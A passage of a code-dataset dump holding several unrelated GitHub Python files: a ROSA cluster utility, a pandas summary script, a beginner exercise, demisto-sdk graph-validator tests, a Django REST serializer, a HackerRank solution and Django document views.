timeout=1200)\n\n\ndef delete_oidc_provider(cluster_id):\n \"\"\"\n Delete oidc provider of the given cluster\n\n Args:\n cluster_id (str): the id of the cluster\n \"\"\"\n cmd = f\"rosa delete oidc-provider -c {cluster_id} --mode auto --yes\"\n utils.run_cmd(cmd, timeout=1200)\n\n\ndef is_odf_addon_installed(cluster_name=None):\n \"\"\"\n Check if the odf addon is installed\n\n Args:\n cluster_name (str): The cluster name. The default value is 'config.ENV_DATA[\"cluster_name\"]'\n\n Returns:\n bool: True, if the odf addon is installed. False, otherwise\n\n \"\"\"\n cluster_name = cluster_name or config.ENV_DATA[\"cluster_name\"]\n addon_name = config.ENV_DATA.get(\"addon_name\")\n addon_info = get_addon_info(cluster_name, addon_name)\n\n if addon_info and \"ready\" in addon_info:\n return True\n else:\n return False\n","repo_name":"musoni123/ocs-ci","sub_path":"ocs_ci/utility/rosa.py","file_name":"rosa.py","file_ext":"py","file_size_in_byte":16688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"29754217804","text":"import pandas as pd\n\n\ndf1 = pd.read_csv('dataWrangling/c1typResults.csv')\ndf2 = pd.read_csv('dataWrangling/c2typResults.csv')\ndf3 = pd.read_csv('dataWrangling/c3typResults.csv')\n\n\nsubc1 = [\n 11214, \n #11263\n]\nsubc2 = [\n #11189,\n #11211,\n 11268,\n 11272,\n 11278,\n 11284\n]\nsubc3 = [\n 11221,\n 11240,\n 11293,\n 11318,\n 11308\n ]\n\nmeans_df1 = df1.groupby(['id','category'], as_index= True)['response'].describe()\nmeans_df1.to_csv( \"C:/Users/apers/partXpush_data/typicality/persubj_encourageTyps_percat.csv\", index=True, encoding='utf-8-sig')\n\n\nmeans_df2 = df2.groupby(['id','category'], as_index= True)['response'].describe()\nmeans_df2.to_csv( \"C:/Users/apers/partXpush_data/typicality/persubj_discourageTyps_percat.csv\", index=True, encoding='utf-8-sig')\n\n\nmeans_df3 = df3.groupby(['id','category'], as_index= True)['response'].describe()\nmeans_df3.to_csv( \"C:/Users/apers/partXpush_data/typicality/persubj_neutralTyps_percat.csv\", index=True, encoding='utf-8-sig')\n\n\n","repo_name":"Josh-Glass/partXpush_data","sub_path":"typicality/getExtenderTyps.py","file_name":"getExtenderTyps.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21435271669","text":"'''\nDesenvolva um programa que leia SEIS NÚMEROS INTEIROS e mostre a soma apenas daqueles que\nforam PARES. Se o valor digitado for ímpar, desconsidere-o.\n'''\nsoma = 0\ncont = 0\nfor n in range(1, 7):\n n = int(input('Digite o {}º número: '.format(n)))\n if n % 2 == 0:\n soma += n\n cont += 1\nprint(f'A quantidade de números PARES são {cont} e a soma deles são {soma}')\n\n\n","repo_name":"gmary23/python_guanabara","sub_path":"mundo2/desafio050.py","file_name":"desafio050.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21452307441","text":"import logging\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, List, Optional\n\nimport pytest\n\nimport demisto_sdk.commands.content_graph.neo4j_service as neo4j_service\nfrom demisto_sdk.commands.common.constants import (\n GENERAL_DEFAULT_FROMVERSION,\n SKIP_PREPARE_SCRIPT_NAME,\n MarketplaceVersions,\n)\nfrom demisto_sdk.commands.common.git_util import GitUtil\nfrom demisto_sdk.commands.common.hook_validations.graph_validator import GraphValidator\nfrom demisto_sdk.commands.common.legacy_git_tools import git_path\nfrom demisto_sdk.commands.content_graph.commands.create import (\n create_content_graph,\n)\nfrom demisto_sdk.commands.content_graph.common import ContentType, RelationshipType\nfrom demisto_sdk.commands.content_graph.interface import (\n ContentGraphInterface,\n)\nfrom demisto_sdk.commands.content_graph.objects.classifier import Classifier\nfrom demisto_sdk.commands.content_graph.objects.integration import Command, Integration\nfrom demisto_sdk.commands.content_graph.objects.pack import Pack\nfrom demisto_sdk.commands.content_graph.objects.playbook import Playbook\nfrom demisto_sdk.commands.content_graph.objects.repository import ContentDTO\nfrom demisto_sdk.commands.content_graph.objects.script import Script\nfrom demisto_sdk.commands.content_graph.tests.create_content_graph_test import (\n mock_relationship,\n mock_test_playbook,\n)\nfrom TestSuite.test_tools import str_in_call_args_list\n\nGIT_PATH = Path(git_path())\n\n\n# FIXTURES\n\n\n@pytest.fixture(autouse=True)\ndef setup_method(mocker):\n \"\"\"Auto-used fixture for setup before every test run\"\"\"\n import demisto_sdk.commands.content_graph.objects.base_content as bc\n\n bc.CONTENT_PATH = GIT_PATH\n mocker.patch.object(neo4j_service, \"REPO_PATH\", GIT_PATH)\n mocker.patch.object(ContentGraphInterface, \"repo_path\", GIT_PATH)\n mocker.patch(\n \"demisto_sdk.commands.common.docker_images_metadata.get_remote_file_from_api\",\n return_value={\n \"docker_images\": {\n \"python3\": {\n \"3.10.11.54799\": {\"python_version\": \"3.10.11\"},\n \"3.10.12.63474\": {\"python_version\": \"3.10.11\"},\n }\n }\n },\n )\n\n\n@pytest.fixture\ndef repository(mocker) -> ContentDTO:\n repository = ContentDTO(\n path=GIT_PATH,\n packs=[],\n )\n relationships = {\n RelationshipType.IN_PACK: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"SamplePack\",\n ContentType.PACK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n mock_relationship(\n \"SampleScript\",\n ContentType.SCRIPT,\n \"SamplePack\",\n ContentType.PACK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n ],\n RelationshipType.HAS_COMMAND: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"test-command\",\n ContentType.COMMAND,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n name=\"test-command\",\n description=\"\",\n deprecated=False,\n ),\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"deprecated-command\",\n ContentType.COMMAND,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n name=\"deprecated-command\",\n description=\"\",\n deprecated=True,\n ),\n ],\n RelationshipType.IMPORTS: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"TestApiModule\",\n ContentType.SCRIPT,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n )\n ],\n RelationshipType.TESTED_BY: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"SampleTestPlaybook\",\n ContentType.TEST_PLAYBOOK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n )\n ],\n RelationshipType.USES_BY_ID: [\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"SampleClassifier\",\n ContentType.CLASSIFIER,\n mandatorily=True,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n mock_relationship(\n \"SampleIntegration\",\n ContentType.INTEGRATION,\n \"SampleClassifier2\",\n ContentType.CLASSIFIER,\n mandatorily=True,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n ],\n RelationshipType.DEPENDS_ON: [\n mock_relationship(\n \"SamplePack\",\n ContentType.PACK,\n \"SamplePack2\",\n ContentType.PACK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n ],\n ),\n ],\n RelationshipType.USES: [\n mock_relationship(\n \"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"DeprecatedIntegration\",\n ContentType.INTEGRATION,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n mock_relationship(\n \"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"deprecated-command\",\n ContentType.COMMAND,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n ],\n }\n relationship_pack2 = {\n RelationshipType.IN_PACK: [\n mock_relationship(\n \"SampleClassifier\",\n ContentType.CLASSIFIER,\n \"SamplePack2\",\n ContentType.PACK,\n ),\n mock_relationship(\n \"SampleTestPlaybook\",\n ContentType.TEST_PLAYBOOK,\n \"SamplePack2\",\n ContentType.PACK,\n ),\n mock_relationship(\n \"TestApiModule\",\n ContentType.SCRIPT,\n \"SamplePack2\",\n ContentType.PACK,\n source_marketplaces=[MarketplaceVersions.XSOAR],\n ),\n mock_relationship(\n \"SampleClassifier2\",\n ContentType.CLASSIFIER,\n \"SamplePack2\",\n ContentType.PACK,\n ),\n ],\n RelationshipType.USES_BY_ID: [\n mock_relationship(\n \"TestApiModule\",\n ContentType.SCRIPT,\n \"SampleScript2\",\n ContentType.SCRIPT,\n mandatorily=True,\n source_marketplaces=[MarketplaceVersions.XSOAR],\n ),\n ],\n }\n relationship_pack3 = {\n RelationshipType.IN_PACK: [\n mock_relationship(\n \"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"SamplePack3\",\n ContentType.PACK,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n mock_relationship(\n \"SamplePlaybook2\",\n ContentType.PLAYBOOK,\n \"SamplePack3\",\n ContentType.PACK,\n source_fromversion=GENERAL_DEFAULT_FROMVERSION,\n ),\n mock_relationship(\n \"SampleScript2\",\n ContentType.SCRIPT,\n \"SamplePack3\",\n ContentType.PACK,\n ),\n ],\n RelationshipType.USES_BY_ID: [\n mock_relationship(\n \"SamplePlaybook\",\n ContentType.PLAYBOOK,\n \"SamplePlaybook2\",\n ContentType.PLAYBOOK,\n mandatorily=True,\n source_marketplaces=[\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.XPANSE,\n ],\n source_fromversion=\"6.5.0\",\n ),\n ],\n }\n relationship_pack4 = {\n RelationshipType.IN_PACK: [\n mock_relationship(\n \"SamplePlaybook\", ContentType.PLAYBOOK, \"SamplePack4\", ContentType.PACK\n )\n ]\n }\n pack1 = mock_pack(\n \"SamplePack\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n pack2 = mock_pack(\"SamplePack2\", [MarketplaceVersions.XSOAR], hidden=True)\n pack3 = mock_pack(\n \"SamplePack3\",\n [\n MarketplaceVersions.XSOAR,\n MarketplaceVersions.MarketplaceV2,\n MarketplaceVersions.XPANSE,\n ],\n )\n pack4 = mock_pack(\"SamplePack4\", list(MarketplaceVersions))\n pack1.relationships = relationships\n pack2.relationships = relationship_pack2\n pack3.relationships = relationship_pack3\n pack4.relationships = relationship_pack4\n pack1.content_items.integration.append(mock_integration())\n pack1.content_items.integration.append(\n mock_integration(name=\"DeprecatedIntegration\", deprecated=True)\n )\n pack1.content_items.script.append(\n mock_script(\n \"SampleScript\",\n [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n )\n )\n pack1.content_items.script.append(\n mock_script(\n \"setIncident\",\n [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n )\n )\n pack2.content_items.script.append(mock_script(\"TestApiModule\"))\n pack2.content_items.script.append(\n mock_script(\n \"getIncidents\",\n marketplaces=[MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n skip_prepare=[SKIP_PREPARE_SCRIPT_NAME],\n )\n )\n pack2.content_items.classifier.append(mock_classifier(\"SampleClassifier2\"))\n pack2.content_items.test_playbook.append(mock_test_playbook())\n pack3.content_items.playbook.append(\n mock_playbook(\n \"SamplePlaybook\",\n [MarketplaceVersions.XSOAR, MarketplaceVersions.XPANSE],\n \"6.5.0\",\n GENERAL_DEFAULT_FROMVERSION,\n )\n )\n pack3.content_items.playbook.append(\n mock_playbook(\n \"SamplePlaybook2\",\n [MarketplaceVersions.XSOAR],\n GENERAL_DEFAULT_FROMVERSION,\n \"6.5.0\",\n )\n )\n pack3.content_items.script.append(mock_script(\"SampleScript2\"))\n pack3.content_items.script.append(\n mock_script(\n \"setAlert\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n )\n pack3.content_items.script.append(\n mock_script(\n \"getAlert\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n )\n pack3.content_items.script.append(\n mock_script(\n \"getAlerts\", [MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2]\n )\n )\n pack4.content_items.playbook.append(mock_playbook(\"SamplePlaybook\"))\n repository.packs.extend([pack1, pack2, pack3, pack4])\n mocker.patch(\n \"demisto_sdk.commands.content_graph.content_graph_builder.ContentGraphBuilder._create_content_dtos\",\n return_value=[repository],\n )\n return repository\n\n\n# HELPERS\n\n\ndef mock_dependency(source: str, target: str, mandatory: bool = True) -> Dict[str, Any]:\n return {\n \"source_id\": source,\n \"source_type\": ContentType.PACK,\n \"target\": target,\n \"target_type\": ContentType.PACK,\n \"mandatorily\": mandatory,\n }\n\n\ndef update_repository(\n repository: ContentDTO,\n commit_func: Callable[[ContentDTO], List[Pack]],\n) -> List[str]:\n updated_packs = commit_func(repository)\n pack_ids_to_update = [pack.object_id for pack in updated_packs]\n repository.packs = [\n pack for pack in repository.packs if pack.object_id not in pack_ids_to_update\n ]\n repository.packs.extend(updated_packs)\n return pack_ids_to_update\n\n\ndef _get_pack_by_id(repository: ContentDTO, pack_id: str) -> Pack:\n for pack in repository.packs:\n if pack.object_id == pack_id:\n return pack\n raise ValueError(f\"Pack {pack_id} does not exist in the repository.\")\n\n\ndef mock_pack(name, marketplaces, hidden=False):\n return Pack(\n object_id=name,\n content_type=ContentType.PACK,\n node_id=f\"{ContentType.PACK}:{name}\",\n path=Path(\"Packs\"),\n name=\"pack_name\",\n marketplaces=marketplaces,\n hidden=hidden,\n server_min_version=\"5.5.0\",\n current_version=\"1.0.0\",\n tags=[],\n categories=[],\n useCases=[],\n keywords=[],\n contentItems=[],\n excluded_dependencies=[],\n deprecated=False,\n )\n\n\ndef mock_playbook(\n name,\n marketplaces=[MarketplaceVersions.XSOAR],\n fromversion=\"5.0.0\",\n toversion=\"99.99.99\",\n):\n return Playbook(\n id=name,\n content_type=ContentType.PLAYBOOK,\n node_id=f\"{ContentType.PLAYBOOK}:{name}\",\n path=Path(name),\n fromversion=fromversion,\n toversion=toversion,\n display_name=name,\n name=name,\n marketplaces=marketplaces,\n deprecated=False,\n is_test=False,\n )\n\n\ndef mock_script(name, marketplaces=[MarketplaceVersions.XSOAR], skip_prepare=[]):\n return Script(\n id=name,\n content_type=ContentType.SCRIPT,\n node_id=f\"{ContentType.SCRIPT}:{name}\",\n path=Path(\"Packs\"),\n fromversion=\"5.0.0\",\n display_name=name,\n toversion=\"6.0.0\",\n name=name,\n marketplaces=marketplaces,\n deprecated=False,\n type=\"python3\",\n docker_image=\"demisto/python3:3.10.11.54799\",\n tags=[],\n is_test=False,\n skip_prepare=skip_prepare,\n )\n\n\ndef mock_integration(name: str = \"SampleIntegration\", deprecated: bool = False):\n return Integration(\n id=name,\n content_type=ContentType.INTEGRATION,\n node_id=f\"{ContentType.INTEGRATION}:{name}\",\n path=Path(name),\n fromversion=\"5.0.0\",\n toversion=\"99.99.99\",\n display_name=name,\n name=name,\n marketplaces=[MarketplaceVersions.XSOAR, MarketplaceVersions.MarketplaceV2],\n deprecated=deprecated,\n type=\"python3\",\n docker_image=\"demisto/python3:3.10.11.54799\",\n category=\"blabla\",\n commands=[\n Command(name=\"test-command\", description=\"\"),\n Command(name=\"deprecated-command\", description=\"\"),\n ],\n )\n\n\ndef mock_classifier(name: str = \"SampleClassifier\"):\n return Classifier(\n id=name,\n content_type=ContentType.CLASSIFIER,\n node_id=f\"{ContentType.CLASSIFIER}:{name}\",\n path=Path(\"Packs\"),\n fromversion=\"5.0.0\",\n display_name=name,\n toversion=\"99.99.99\",\n name=name,\n marketplaces=[MarketplaceVersions.XSOAR],\n deprecated=False,\n type=\"python3\",\n docker_image=\"mock:docker\",\n tags=[],\n is_test=False,\n )\n\n\n# TESTS\n\n\ndef test_are_toversion_relationships_paths_valid(repository: ContentDTO):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"are_toversion_relationships_paths_valid\"\n Then\n - Validate the existance of invalid to_version relationships\n \"\"\"\n\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_toversion_fields()\n\n assert not is_valid\n\n\ndef test_are_fromversion_relationships_paths_valid(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the vaidation \"are_fromversion_relationships_paths_valid\"\n Then\n - Validate the existance of invalid from_version relationships\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_fromversion_fields()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"Content item 'SamplePlaybook' whose from_version is '6.5.0' uses the content\"\n \" items: 'SamplePlaybook2' whose from_version is higher\",\n )\n\n\n@pytest.mark.parametrize(\n \"include_optional, is_valid\",\n [\n pytest.param(\n False,\n True,\n id=\"Not providing git_files - should be valid (raised a warning)\",\n ),\n pytest.param(\n True,\n False,\n id=\"providing git_files - should be invalid\",\n ),\n ],\n)\ndef test_is_file_using_unknown_content(\n mocker,\n repository: ContentDTO,\n include_optional: bool,\n is_valid: bool,\n):\n \"\"\"\n Given\n - A content repo\n - An integration SampleIntegration's default classifier is set to \"SampleClassifier\" which does not exist\n When\n - running the vaidation \"is_file_using_unknown_content\"\n Then\n - Check whether the graph is valid or not, based on whether optional content dependencies were included.\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n logger_warning = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"warning\")\n with GraphValidator(\n update_graph=False, git_files=[], include_optional_deps=include_optional\n ) as graph_validator:\n create_content_graph(graph_validator.graph)\n assert graph_validator.is_file_using_unknown_content() == is_valid\n\n logger_to_search = logger_warning if is_valid else logger_error\n\n assert str_in_call_args_list(\n logger_to_search.call_args_list,\n \"Content item 'SampleIntegration' using content items: SampleClassifier which\"\n \" cannot be found in the repository\",\n )\n\n\ndef test_is_file_display_name_already_exists(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the vaidation \"is_file_display_name_already_exists\"\n Then\n - Validate the existance of duplicate display names\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.is_file_display_name_already_exists()\n\n assert not is_valid\n for i in range(1, 4):\n assert str_in_call_args_list(\n logger_error.call_args_list,\n f\"Pack 'SamplePack{i if i != 1 else ''}' has a duplicate display_name\",\n )\n\n\ndef test_validate_unique_script_name(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the vaidation \"validate_unique_script_name\"\n Then\n - Validate the existance of duplicate script names\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_unique_script_name()\n\n assert not is_valid\n\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"Cannot create a script with the name setAlert, \"\n \"because a script with the name setIncident already exists.\\n\",\n )\n\n assert not str_in_call_args_list(\n logger_error.call_args_list,\n \"Cannot create a script with the name getAlert, \"\n \"because a script with the name getIncident already exists.\\n\",\n )\n\n # Ensure that the script-name-incident-to-alert ignore is working\n assert not str_in_call_args_list(\n logger_error.call_args_list,\n \"Cannot create a script with the name getAlerts, \"\n \"because a script with the name getIncidents already exists.\\n\",\n )\n\n\ndef test_are_marketplaces_relationships_paths_valid(\n repository: ContentDTO, caplog, mocker\n):\n \"\"\"\n Given\n - A content repo\n When\n - running the validation \"is_file_display_name_already_exists\"\n Then\n - Validate the existence invalid marketplaces uses\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_marketplaces_fields()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"Content item 'SamplePlaybook' can be used in the 'xsoar, xpanse' marketplaces\"\n \", however it uses content items: 'SamplePlaybook2' which are not supported in\"\n \" all of the marketplaces of 'SamplePlaybook'\",\n )\n\n\ndef test_validate_dependencies(repository: ContentDTO, caplog, mocker):\n \"\"\"\n Given\n - A content repo\n When\n - running the vaidation \"validate_dependencies\"\n Then\n - Validate the existance invalid core pack dependency\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n mocker.patch(\n \"demisto_sdk.commands.common.hook_validations.graph_validator.get_marketplace_to_core_packs\",\n return_value={MarketplaceVersions.XSOAR: {\"SamplePack\"}},\n )\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_dependencies()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"The core pack SamplePack cannot depend on non-core packs: \",\n )\n\n\ndef test_validate_duplicate_id(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo with duplicate ids \"SamplePlaybook\" (configured on repository fixture)\n When\n - running the validation \"validate_duplicate_id\"\n Then\n - Validate the existence of duplicate ids\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n\n with GraphValidator(update_graph=False) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = graph_validator.validate_duplicate_ids()\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"[GR105] - The ID 'SamplePlaybook' already exists in\",\n )\n\n\ndef test_pack_ids_collection():\n git_files = [\n \"Tests/conf.json\",\n \"Packs/MicrosoftExchangeOnline/Integrations/EwsExtension/README.md\",\n ]\n expected_pack_ids = [\"MicrosoftExchangeOnline\"]\n with GraphValidator(update_graph=False, git_files=git_files) as graph_validator:\n assert graph_validator.pack_ids == expected_pack_ids\n\n\ndef test_deprecated_usage__existing_content(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo with item using deprecated commands in existing content.\n When\n - running the validation validate_deprecated_items_usage\n Then\n - validate warning is display but it's considered as valid\n \"\"\"\n\n logger_info = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"warning\")\n with GraphValidator(update_graph=False) as validator:\n create_content_graph(validator.graph)\n is_valid = validator.validate_deprecated_items_usage()\n\n assert is_valid\n assert str_in_call_args_list(\n logger_info.call_args_list,\n \"[GR107] - The Command 'deprecated-command' is deprecated but used in the following content item:\",\n )\n assert str_in_call_args_list(\n logger_info.call_args_list,\n \"[GR107] - The Integration 'DeprecatedIntegration' is deprecated but used in the following content item:\",\n )\n\n\ndef test_deprecated_usage__new_content(repository: ContentDTO, mocker):\n \"\"\"\n Given\n - A content repo with the new item \"SamplePlaybook\" using a deprecated command.\n When\n - running the validation validate_deprecated_items_usage\n Then\n - validate the files considered as invalid.\n \"\"\"\n mocker.patch.object(GitUtil, \"added_files\", return_value=[Path(\"SamplePlaybook\")])\n with GraphValidator(update_graph=False) as validator:\n create_content_graph(validator.graph)\n is_valid = validator.validate_deprecated_items_usage()\n\n assert not is_valid\n\n\n@pytest.mark.parametrize(\n \"changed_pack\", [\"Packs/SamplePack\", \"Packs/SamplePack2\", None]\n)\ndef test_validate_hidden_pack_is_not_mandatory_dependency(\n repository: ContentDTO, mocker, changed_pack: Optional[str]\n):\n \"\"\"\n Given\n - A content repo which contains SamplePack that is dependent on\n SamplePack2 (which is hidden) as mandatory dependency\n\n When\n - Case A: the changed file was the hidden pack.\n - Case B: the changed file was the hidden pack's mandatory dependency\n - Case C: validate all triggered (no git files were sent)\n\n Then\n - validate that an error occurs with a message stating that SamplePack2 is hidden and has mandatory dependencies\n \"\"\"\n logger_error = mocker.patch.object(logging.getLogger(\"demisto-sdk\"), \"error\")\n\n git_files = [Path(changed_pack)] if changed_pack else changed_pack\n\n with GraphValidator(update_graph=False, git_files=git_files) as graph_validator:\n create_content_graph(graph_validator.graph)\n is_valid = (\n graph_validator.validate_hidden_packs_do_not_have_mandatory_dependencies()\n )\n\n assert not is_valid\n assert str_in_call_args_list(\n logger_error.call_args_list,\n \"[GR108] - SamplePack pack(s) cannot have a mandatory dependency on the hidden pack SamplePack2\",\n )\n","repo_name":"demisto/demisto-sdk","sub_path":"demisto_sdk/commands/content_graph/tests/graph_validator_test.py","file_name":"graph_validator_test.py","file_ext":"py","file_size_in_byte":27044,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"52"} +{"seq_id":"25284736992","text":"from django.db import IntegrityError\nfrom rest_framework import serializers\nfrom .models import Favourite\n\n\nclass FavouriteSerializer(serializers.ModelSerializer):\n username = serializers.ReadOnlyField(source='username.username')\n\n class Meta:\n model = Favourite\n fields = [\n 'id',\n 'username',\n 'post',\n 'created_on',\n ]\n\n def create(self, validated_data):\n try:\n return super().create(validated_data)\n except IntegrityError:\n raise serializers.ValidationError({\n 'detail': 'duplicated favourite'\n })\n","repo_name":"llewellynksj/ecoflock-drf-api","sub_path":"favourites/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18321569677","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'minimumBribes' function below.\n#\n# The function accepts INTEGER_ARRAY q as parameter.\n#\n\ndef minimumBribes(q):\n # Write your code here\n\n jumps = 0\n shift = 1\n for i in range(len(q)):\n tmp = q[i] - shift - i\n if tmp > 0:\n jumps += tmp\n for j in range(i + 1, i + tmp, 1):\n q[j] += 1\n if tmp > 2:\n return \"Too chaotic\"\n return str(jumps)\n\n\nif __name__ == '__main__':\n q = [1, 2, 5, 3, 7, 8, 6, 4]\n\n print(minimumBribes(q))\n","repo_name":"lukaszbednarz/HackerRankWarmUp","sub_path":"NewYearChaos.py","file_name":"NewYearChaos.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71405351525","text":"from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views.generic import ListView\nfrom django.views.generic.base import View\nfrom django.views.generic.edit import FormMixin\n\nfrom documents.forms import DocumentForm\nfrom documents.models import Document, Category\n\n\ndef _get_exception_message(e):\n \"\"\"Returns the generic exception message\"\"\"\n return 'Surgió un error desconocido al eliminar el documento. Contacta a nuestro ' \\\n 'equipo técnico usando el correo: uesvirtual@ues.mx ' \\\n 'diciendo que surgió un error tipo: {}'.format(type(e).__name__)\n\n\nclass DocumentsHomeView(LoginRequiredMixin, FormMixin, ListView):\n \"\"\"\n Documents Home View.\n \"\"\"\n template_name = 'documents_home.html'\n model = Document\n paginate_by = 5\n form_class = DocumentForm\n\n def get_context_data(self, **kwargs):\n \"\"\"Used to attach a 'categories' object to the context\"\"\"\n context = super(DocumentsHomeView, self).get_context_data(**kwargs)\n context.update({\n 'categories': Category.objects.all()\n })\n return context\n\n def get_queryset(self):\n \"\"\"Filters by user\"\"\"\n query_set = super(DocumentsHomeView, self).get_queryset()\n query_set = query_set.filter(user=self.request.user)\n return query_set\n\n def get_success_url(self):\n \"\"\"Returns the url after a successful upload\"\"\"\n return reverse('documents:home')\n\n def post(self, request, *args, **kwargs):\n \"\"\"Handles the file upload\"\"\"\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n file = form.save(commit=False)\n file.user = request.user\n file.save()\n messages.success(request, 'El documento \"{}\" se subió correctamente, ¡muchas gracias!'\n .format(form.files['file']))\n return self.form_valid(form)\n else:\n for error in form.errors['file']:\n messages.error(request, error)\n return redirect('documents:home')\n\n\nclass DocumentsDeleteView(View):\n \"\"\"\n Documents Delete View\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n \"\"\"Deletes a document\"\"\"\n try:\n document_id = request.POST['document_id']\n document = Document.objects.filter(id=document_id).last()\n document.disabled = True\n document.save()\n messages.success(request, '¡El documento fue eliminado con éxito')\n except KeyError:\n messages.error(request, 'No se encontró el documento.')\n except Exception as e:\n messages.error(request, _get_exception_message(e))\n\n return redirect('documents:home')\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Handles the case when a user tries to delete another user's document\"\"\"\n document_id = request.POST['document_id']\n document = Document.objects.filter(id=document_id).last()\n\n if not document:\n messages.error(request, 'No se encontró el documento.')\n return redirect('documents:home')\n\n if document.user.id != self.request.user.id:\n messages.error(request, 'No tiene permiso para eliminar el documento')\n raise PermissionDenied\n\n return super().dispatch(request, *args, 